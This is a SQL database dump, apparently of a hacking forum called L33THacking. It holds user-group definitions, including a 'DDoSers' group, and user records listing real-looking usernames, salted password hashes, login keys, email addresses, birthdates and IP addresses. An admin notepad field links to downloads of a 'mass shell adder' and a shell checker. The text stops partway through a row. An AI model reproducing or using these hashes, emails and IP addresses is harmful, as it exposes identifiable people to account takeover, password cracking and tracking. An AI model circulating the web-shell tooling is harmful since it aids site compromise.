INTO mybb_usergroups VALUES('20', '4', 'DDoSers', 'A group for people who like DDoSing sites.', '<span style=\"color: grey;\">{username}</span>', 'DDoSER', '7', 'images/stars/grey.png', 'images/ub/ddosers.gif', '18', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('21', '4', 'The Marketers', 'We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too.', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.gif', 'images/ub/marketers.gif', '18', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); DROP TABLE IF EXISTS mybb_users; CREATE TABLE mybb_users ( uid int(10) unsigned NOT NULL auto_increment, username varchar(120) NOT NULL, password varchar(120) NOT NULL, salt varchar(10) NOT NULL, loginkey varchar(50) NOT NULL, email varchar(220) NOT NULL, postnum int(10) NOT NULL, avatar varchar(200) NOT NULL, avatardimensions varchar(10) NOT NULL, avatartype varchar(10) NOT NULL, usergroup smallint(5) unsigned NOT NULL, additionalgroups varchar(200) NOT NULL, displaygroup smallint(5) unsigned NOT NULL, usertitle varchar(250) NOT NULL, regdate bigint(30) NOT NULL, lastactive bigint(30) NOT NULL, lastvisit bigint(30) NOT NULL, lastpost bigint(30) NOT NULL, website varchar(200) NOT NULL, icq varchar(10) NOT NULL, aim varchar(50) NOT NULL, yahoo varchar(50) NOT NULL, msn varchar(75) NOT NULL, birthday varchar(15) NOT NULL, birthdayprivacy varchar(4) DEFAULT 'all' NOT NULL, signature text NOT NULL, allownotices int(1) NOT NULL, hideemail int(1) NOT NULL, subscriptionmethod int(1) NOT NULL, invisible int(1) NOT NULL, receivepms int(1) NOT NULL, receivefrombuddy int(1) NOT NULL, pmnotice int(1) NOT NULL, pmnotify int(1) NOT NULL, threadmode varchar(8) NOT NULL, showsigs int(1) NOT NULL, showavatars int(1) NOT NULL, showquickreply int(1) NOT NULL, showredirect int(1) NOT NULL, ppp smallint(6) NOT NULL, tpp smallint(6) NOT NULL, daysprune smallint(6) NOT NULL, dateformat varchar(4) NOT NULL, timeformat varchar(4) NOT NULL, timezone varchar(4) NOT NULL, dst int(1) NOT NULL, dstcorrection int(1) NOT NULL, buddylist text NOT NULL, ignorelist text NOT NULL, style smallint(5) unsigned NOT NULL, away int(1) NOT NULL, awaydate int(10) unsigned NOT NULL, returndate varchar(15) NOT NULL, awayreason varchar(200) NOT NULL, pmfolders text NOT NULL, notepad text NOT NULL, referrer int(10) unsigned NOT NULL, referrals int(10) unsigned NOT NULL, reputation bigint(30) NOT NULL, regip varchar(50) NOT NULL, lastip varchar(50) NOT NULL, longregip int(11) NOT NULL, longlastip int(11) NOT NULL, language varchar(50) NOT NULL, timeonline bigint(30) NOT NULL, showcodebuttons int(1) DEFAULT '1' NOT NULL, totalpms int(10) NOT NULL, unreadpms int(10) NOT NULL, warningpoints int(3) NOT NULL, moderateposts int(1) NOT NULL, moderationtime bigint(30) NOT NULL, suspendposting int(1) NOT NULL, suspensiontime bigint(30) NOT NULL, suspendsignature int(1) NOT NULL, suspendsigtime bigint(30) NOT NULL, coppauser int(1) NOT NULL, classicpostbit int(1) NOT NULL, loginattempts tinyint(2) DEFAULT '1' NOT NULL, failedlogin bigint(30) NOT NULL, usernotes text NOT NULL, privatewarning varchar(200), achivements text NOT NULL, threads int(10) unsigned NOT NULL, PRIMARY KEY (uid), KEY username (username), KEY usergroup (usergroup), KEY birthday (birthday), KEY longregip (longregip), KEY longlastip (longlastip) ); INSERT INTO mybb_users VALUES('1', 't3h jok3r', 'ea8e67071f6a25d2bf8bc784628fcf2c', 'yjPiQ1v9', '7COJWdgIFBfzXfMhEgW1IYuDie3p2xoMYifE8nq8UXUmvz7Srd', 'kamihafeez@hotmail.com', '1025', './uploads/avatars/avatar_1.gif?dateline=1349757611', '100|100', 'upload', '4', '13', '0', '', '1339729481', '1352680118', '1352680118', '1352662960', '', '0', '', '', '', '', 'all', '[align=center][img]http://img27.imageshack.us/img27/2654/lhfb.png[/img][/align]\r\n[align=center]Vote for L33THACKING [url=http://forumtopsites.net/index.php?a=in&u=joker]HERE[/url][/align]\r\n', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '0', '0', '0', '0', '0', '0', '-4', '1', '2', '2,20,61', '', '0', '0', '0', '', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', 'https://www.youtube.com/watch?v=u-0b6r4o7WA&feature=autoplay&list=ULZ0BD0fjapbg&playnext=8\r\n\r\nProdigy Source (Mass shell adder added by Natha from a different Forum):\r\nhttp://www.mediafire.com/?2g5atps0t9pks7f\r\nShell Checker - By Unknown\r\nhttp://www.mediafire.com/?du52p5rlfdm5ura \r\n\r\n------------------------------------------------------------------------------------------------\r\n\r\nHere\'s one of my old projects, IP-Manager. I\'ve worked on this on and off for around 4 days. I got quite far with it thanks to help from sh@rp, Ace and KoBE from TechLifeForum. I\'m open to suggestions - There\'s a few in-detail component\'s yet to edit, but here\'s the current program as-is. I\'m quite happy as it is so far, this will probably be the biggest project I\'ve done so far, it looks quite simple but with making the program save the items every time you close the program it was a real pain getting even the beta version out, so I hope you enjoy it.\r\n\r\nWhy Not Just Use Notepad?\r\n[list]\r\n[*]Because this program looks awesome\r\n[*]Easily accessible\r\n[*]Friendly UI\r\n[*]Noob Friendly\r\n[*]Notepad is stupid =3\r\n[/list]\r\n\r\nWhat\'s To Come?\r\n[list]\r\n[*]Copy IP on Right Click\r\n[*]Updates Checker\r\n[*]Ad Spaces (allow you to advertise within the program) (?)\r\n[*]User Registration (?)\r\n[/list]\r\n\r\n(?) = Thinking about, is not definite.\r\n\r\nDownload Link:\r\nhttp://www.mediafire.com/?y3tah52sp288ag3\r\n\r\nVirus Scan:\r\n0/43\r\nhttps://www.virustotal.com/file/8f8b1732fe4b4da0fd232fe521d9e65a55d23a76660532b8e7f22071a39b0728/analysis/1332204222/\r\n\r\n---------------------------------------------------------------------------------------------------------------\r\n\r\nYou may be asking what is twitters bootstrap and why would I want to use it?\r\n\r\nBootstrap is a sleek, intuitive, and powerful front-end framework for faster and easier web development.\r\n\r\nPro\'s and Cons\r\n\r\nPros: \r\n- Easy to use\r\n- Pre coded css\r\n- Pre coded jquery\r\n- Very well documented\r\n- Tablet/ mobile support\r\n- For all browsers!\r\n\r\nCons:\r\n- so far none.\r\n\r\nwell, you might be asking what do I need to use this?\r\n \r\nyou\'re going to need a web server, ftp client, a text editor, and last but not lest bootstrap\r\n\r\nDownload the bootstrap here: http://twitter.github.com/bootstrap/index.html\r\n\r\nDocument page about the bootstrap: http://twitter.github.com/bootstrap/scaffolding.html\r\n\r\nFor these examples I used Notepad++\r\n\r\n\r\nFirst extract, the file and then Upload the bootstrap to your webserver using a ftp client not that hard...\r\n\r\nSo your root should look like {root dir}/bootstrap\r\n\r\nand you should see a css folder and a js folder, in the bootstrap directory\r\n\r\nsoo, now lets move on and start writing somecode\r\n\r\nso go to your root directory and write this html template,\r\n\r\n[img]http://img138.imageshack.us/img138/9754/e7056d74d2b7478f9ff2123.png[/img]\r\n\r\nhere is the code for you lame asses, \r\n\r\n[code]\r\n<!-- Immortal @ Anarchy Forums -->\r\n\r\n <!DOCTYPE html>\r\n <html>\r\n \r\n <head>\r\n <title>Example Code</title>\r\n <!-- Loading the bootstrap css file -->\r\n <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\r\n </head>\r\n \r\n <body>\r\n \r\n <h1>Hello, world!</h1>\r\n <!-- Loading jquery -->\r\n <script src=\"http://code.jquery.com/jquery-latest.js\"></script>\r\n <!-- Loading the bootstrap javascript file -->\r\n <script src=\"/bootstrap/js/bootstrap.min.js\"></script>\r\n \r\n \r\n </body>\r\n \r\n </html>\r\n[/code]\r\n\r\n\r\nSoo now we are going to use, navbar to give us a sexy link tablet.\r\n\r\n[img]http://img208.imageshack.us/img208/755/9d520dfa099f4047bb42f97.png[/img]\r\n\r\n[code]\r\n<!-- Immortal @ Anarchy Forums -->\r\n <!DOCTYPE html>\r\n <html>\r\n <head>\r\n <title>Example Code</title>\r\n <!-- Loading the bootstrap css file -->\r\n <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\r\n </head>\r\n \r\n <body>\r\n <div class=\"navbar\">\r\n <div class=\"navbar-inner\">\r\n <a class=\"brand\" href=\"#\">Welcome Home</a>\r\n <ul class=\"nav\">\r\n <li class=\"active\"><a href=\"#\">Page 1</a></li>\r\n <li><a href=\"#\">Page 2</a></li>\r\n <li><a href=\"#\">Page 3</a></li>\r\n </ul>\r\n </div>\r\n </div>\r\n <!-- Loading jquery -->\r\n <script src=\"http://code.jquery.com/jquery-latest.js\"></script>\r\n <!-- Loading the bootstrap javascript file -->\r\n <script src=\"/bootstrap/js/bootstrap.min.js\"></script>\r\n \r\n </body>\r\n </html>\r\n[/code]\r\n\r\nhere is, what the site looks like.\r\n\r\n[img]http://img21.imageshack.us/img21/6694/86db50116b00440ab2f99c9.png[/img]', '0', '11', '66', '72.229.164.105', '72.231.24.165', '1223009385', '1223104677', '', '1007421', '1', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', 'If you have any questions, feel free to contact me.', 'a:3:{s:4:\"apid\";a:3:{i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"acid\";a:17:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:9;a:5:{s:4:\"acid\";i:9;s:4:\"name\";s:9:\"Referrer \";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:5:{s:4:\"acid\";i:1;s:4:\"name\";s:15:\"Social Engineer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:19;a:5:{s:4:\"acid\";i:19;s:4:\"name\";s:6:\"Genius\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:15;a:5:{s:4:\"acid\";i:15;s:4:\"name\";s:12:\"Silver Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:1;a:5:{s:4:\"atid\";i:1;s:4:\"name\";s:12:\"Contributor \";s:5:\"image\";s:60:\"inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '131'); INSERT INTO mybb_users VALUES('224', 'monkey', '37423d66765b5c0daf3aec96ac00a231', 'OAzQjuWt', 'sFMf4y3XqlbvpSuuMlxza4Gj3a8H7ygpbZ9u4Rk4jjFAcsJJlE', 'alsalti.mutasim@yahoo.com', '0', '', '', '', '14', '', '0', '', '1349490987', '1350833628', '1350831439', '1350152195', '', '0', '', '', '', '19-3-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.87.19.149', '108.87.21.224', '1817645973', '1817646560', '', '11159', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('225', 'Graycat', 'aba14313d1d7d5da3af195991903cba8', 'Rm82dg4V', 'bCLvyz22HgYlMNeD2OfoTro2GvHU1jmYdJOuUHjOrTX5vgs5if', 'cakes1337@gmail.com', '6', '', '', '', '2', '', '0', '', '1349495250', '1349745368', '1349702860', '1349702860', '', '0', '', '', '', '21-10-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-6', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '6', '75.162.63.63', '75.162.63.152', '1268924223', '1268924312', '', '2456', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('154', 'fap', '89e5681ca4c09df5280575cc303bbb0c', 'Y2nzEaMQ', 'cXxxTuzGCTFZzkmCRNvMcLdgpoSm7n1zlaCz431DTZ6HELru2q', 'eqonix@live.co.uk', '4', '', '', '', '2', '', '0', '', '1346370056', '1347177983', '1346496503', '1346496493', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '92.234.104.156', '72.229.164.105', '1558866076', '1223009385', '', '2087', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('155', 'HaZe', '43514a07d9119200862155f97f68fed6', 'sMeZpXO5', 'Roq9PeK7Zhxelav3E9hu2Xfzcpz35OpIXneqpZPaMd6YXDgd2x', 'uregonnadie@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346370609', '1346370888', '1346370609', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.52.27.23', '173.52.27.23', '-1389094121', '-1389094121', '', '281', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('156', 'Omniscent', 'f2dd256c3b511a3fdad34370103dfea0', 'DWvq8RYM', 'btqm8gerulCtZGDrDo6d8ICgRpIuRrA6XXXaXwvQcw5BTQU5ke', 'storm1336instant@gmail.com', '1', '', '', '', '2', '', '0', 'heyo.', '1346370834', '1346792351', '1346778855', '1346465732', '', '0', '', '', '', '', 'none', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '1', '74.14.157.68', '74.14.157.68', '1242471748', '1242471748', '', '4199', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('230', 'MatrixXx', '0790e591fb07a35c0a3d90eeef3378a7', 'bVLO2zXW', 'SCsKGfAuwfQpfAh5yt5TsgmLUETTPVO4KxPAeWhCPFBtKfvBWv', 'matrixxx35@gmail.com', '0', '', '', '', '2', '', '0', '', '1349637644', '1349638297', '1349638297', '0', '', '0', '', '', '', '4-6-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '88.164.243.5', '88.164.243.5', '1487205125', '1487205125', '', '668', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('108', 'zipper1936', '72c660e635bbbb39c47fa575d33f9468', 'IN76ECoE', 'O3pryxoCjPb2dVGsJO8U2edZouySk3NuV2qCV95BOyHfP7EmOb', 'kentespinoza443@gmx.com', '0', '', '', '', '14', '', '0', '', '1345810510', '1345810768', '1345810767', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '1', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '1', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '5.135.12.198', '5.135.12.96', '92736710', '92736608', 'english', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('112', '??????Z', '9de5895dc445061e43fdf49124893025', 'O9DupUmh', 'BlzMPdxOrbBkv5USgGQcas2sBRHNvDzUwaJIEwmq4NPdRhZNx8', 'vaider@42commando.com', '35', 'http://i.imgur.com/yccvM.png?dateline=1347964416', '120|150', 'remote', '2', '', '0', 'SE N00B', '1345828459', '1350390938', '1350063877', '1347976009', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/lkLHB.png[/img]\r\n[color=#696969]Email: kennerz@l33thacking.net[/color][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '92.22.242.209', '2.100.220.219', '1545007825', '40164571', '', '63303', '1', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', NULL, 'b:0;', '6'); INSERT INTO mybb_users VALUES('228', 'VirtualLegend', '5d06ac4ace1250271e4e34043153f317', 'ObHJONpp', 'GbUH77RcjbcVQlZUrWTOInvrpTugEKI6M4aw41RFbwnCdOKWau', 'ielmessaoudi@unic-utrecht.nl', '271', './uploads/avatars/avatar_228.gif?dateline=1349717886', '100|80', 'upload', '6', '17,21,13', '6', 'Ball So Hard MotherF*ckers Wanna Find Me', '1349635899', '1352754885', '1352727059', '1352665871', '', '0', '', '', '', '13-7-1994', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '4', '10', '83.83.167.183', '83.83.167.183', '1397991351', '1397991351', '', '227579', '1', '89', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:3:{i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}}', '19'); INSERT INTO mybb_users VALUES('232', 'BreShiE', 'ecc21dac489698bd8153c155a7372965', 'JofeSK8A', 'UiPc7k73eo6of3f1ULWxYUnPLFLauUnFiKqNofirrgppz4PcQq', 'breshie@hotmail.com', '28', './uploads/avatars/avatar_232.png?dateline=1349668623', '120|120', 'upload', '2', '12', '12', '', '1349651002', '1352516717', '1352001220', '1351631985', '', '0', '', '', '', '22-7-1994', 'all', '[align=center][url=http://breshie.com][img]http://breshie.com/breshiesig.png[/img][/url]\r\n\r\n[size=x-small][i]\"It was pretty impressive to watch a missile fly down an air vent, but couldn\'t we feasibly use that same technology to shoot food at hungry people?\"[/i][/size][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '1', '0', '78.149.68.187', '78.150.34.195', '1318405307', '1318462147', '', '21364', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '3'); INSERT INTO mybb_users VALUES('2', 'Apathy', '46bca34be0799be422301a007d17d0e4', 'uhsTQd2L', 'fTBop9sPxqN95Fbl7Wg9Wpcf4PeEywi5LAaiheJJkmRXkh4IJd', 'lonerider223@yahoo.ca', '228', '', '', '', '3', '', '0', 'LH Co-Founder ', '1339902841', '1352433307', '1352408253', '1352433223', '', '0', '', '', '', '', 'all', '', '0', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '***Normal Members***\r\n\r\n1. Ask for their IP and check via (http://l33thacking.com/modcp.php?action=ipsearch) if a lot of posts come in the results. If a lot of results show up then it means that that IP has been used a lot also search users to see if it belongs to the stolen/hacked account.\r\n\r\n2. Ask what latest PM they remember they replied to. Go to the hacked/stolen account and use the login to the account and browse their inbox to check if they are legit or not because anyone can get the IP.\r\n\r\n***Normal Members but with donation award(s)***\r\n\r\n1. Ask for IP or IP and PM.\r\n2. Ask them to give a screenshot of the donation transaction they made to LH then match date with award.\r\n\r\n***Upgraded***\r\n\r\n1. Ask for IP\r\n2. Proof of Purchase of upgrade. Picture or video, match date with the award given data.\r\n3. Tell them to list any forum that can be viewed after upgrading under the VIP members tab.\r\n\r\n*#$*#$*#$*NOTE*#$*#$*#$*\r\n\r\nIf you believe that the account really belongs to them then change their email to the new email they provide you. Then after they change the password, merge the account.', '0', '0', '26', '173.206.128.200', '173.206.129.140', '-1378975544', '-1378975348', '', '106260', '1', '139', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', 'Pm me if you need help.', 'a:3:{s:4:\"apid\";a:2:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"acid\";a:4:{i:21;a:5:{s:4:\"acid\";i:21;s:4:\"name\";s:9:\"Music Fan\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:7:\"Painter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}}', '13'); INSERT INTO mybb_users VALUES('3', '??????????¢™', 'd667fd2b62f764ae14deaa3df983f5eb', 'RHWvVnPS', 'CLzyhFeO7aadSlH7kDVLv5h4s9Vr4MtH5ucdp4pVxEPumEdUDq', 'solid9deep@yahoo.com', '195', './uploads/avatars/avatar_3.png?dateline=1348980965', '120|33', 'upload', '3', '', '0', 'Having Trouble? PM me', '1339904641', '1351314831', '1351313317', '1351313219', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/ZWG4J.gif[/img][/align]', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-7', '0', '2', '', '', '0', '1', '1350705509', '31-12-9999', 'Forgot my way home!', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '9', '75.22.48.94', '75.22.48.43', '1259745374', '1259745323', '', '148973', '1', '82', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:4:{i:21;a:5:{s:4:\"acid\";i:21;s:4:\"name\";s:9:\"Music Fan\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:2:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '18'); INSERT INTO mybb_users VALUES('4', 'Triple H', '012da23e98627651b9782092d1992efe', '6lbjzxCj', '9ViKD6KLUewO6tDxsw2i5rLCD4JWpLJdgM4lSdTbTyYCeG4Hxr', 'test@l33thacking.com', '130', 'images/avatars/supertux.gif?dateline=1340078339', '120|102', 'gallery', '2', '', '0', '', '1339994612', '1352748875', '1352702288', '1352597811', '', '0', '', '', '', '', 'all', 'I love L33THacking.com!', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '2', '', 